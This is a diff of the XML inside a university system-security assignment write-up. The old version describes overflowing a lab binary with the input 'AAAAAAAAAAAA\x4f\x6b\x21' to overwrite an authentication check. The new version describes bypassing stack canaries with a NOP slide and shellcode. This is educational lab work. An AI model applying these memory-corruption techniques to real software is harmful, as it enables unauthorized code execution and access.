--- a/5/Assignment_5_documentation.docx
+++ b/5/Assignment_5_documentation.docx
@@ -1,20 +1,17 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Picture"/>
-        <w:keepNext w:val="true"/>
-        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
-        <w:ind w:hanging="0"/>
-        <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DF5FF32" wp14:editId="714C0664">
             <wp:extent cx="5400040" cy="1224280"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1" name="Picture 1" descr="Verbundprojekt: Migrantenorganisationen und die Ko-Produktion sozialer ..."/>
@@ -31,7 +28,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId2"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -84,74 +81,31 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Cmlapkarstanszk"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Systemsicherheit (211011-SS 2026)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Systemsicherheit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (211011-SS 2026)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
@@ -184,36 +138,30 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
         <w:t>Matias Soto</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Cmlapszerz"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Matej Heřman</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Cmlapszerz"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>Daniel Szabo</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
@@ -228,1694 +176,1863 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="0"/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:keepLines/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:smallCaps/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:hanging="0"/>
-        <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:t>BOCHUM, 2026</w:t>
       </w:r>
       <w:r>
-        <w:rPr/>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
-        <w:rPr/>
         <w:instrText xml:space="preserve"> SUBJECT </w:instrText>
       </w:r>
       <w:r>
-        <w:rPr/>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
-        <w:rPr/>
-      </w:r>
-      <w:r>
-        <w:rPr/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:pStyle w:val="Nadpis1"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Stack Canaries</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Lorem ipsum.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:hanging="0" w:start="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Picture"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>What we can deduct from this code is that instead of using a simple integer for storing auth_flag the function now uses three bytes that are set to a specific value. These are 0x21, 0x6k and 0x4f. If any of these differ then the function returns a false value.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Now to carry out our attack we need to set these 3 bytes to the correct values. For that we need to find the address of the buffer and the authenticating bytes as well. The strcpy function stores its return value in ebp-0x17 and the bytes that are compared are ebp-0x9, ebp-0xa and ebp-0xb. The difference between these addresses are 14, 13 and 12 bytes. Thus, the variables are most likely stored the same way. So, after the twelve padding A characters adding 0x4f 0x6b and 0x21 should result in a break.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Writing this string ("AAAAAAAAAAAA\x4f\x6b\x21") directly as an argument to the doa program results in a segmentation fault. That is why we use solution.txt to store our input and use "$(cat solution.txt)" to copy its values to the input, preventing the segmentation fault. In the text file we can also see that the value of the authenticating bytes is simply “Ok!”.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This exercise is using stack canaries to ensure the return address of the function was not tampered with. We use GDB to find which canaries are in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stack_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> array. For our canary we used number </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>1271845313</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>because</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>when</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>transfered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>into</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>bytes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> has no „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>bad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>characters</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>We</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NOP slide </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>technique</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>creating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> slide </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>shellscript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>overwriting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to point in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>middle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> slide). </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> program has to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>be</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> run </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>multiple</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>times</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>canary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>be</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>same</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>chosen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="cs-CZ"/>
+        </w:rPr>
+        <w:t>one</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
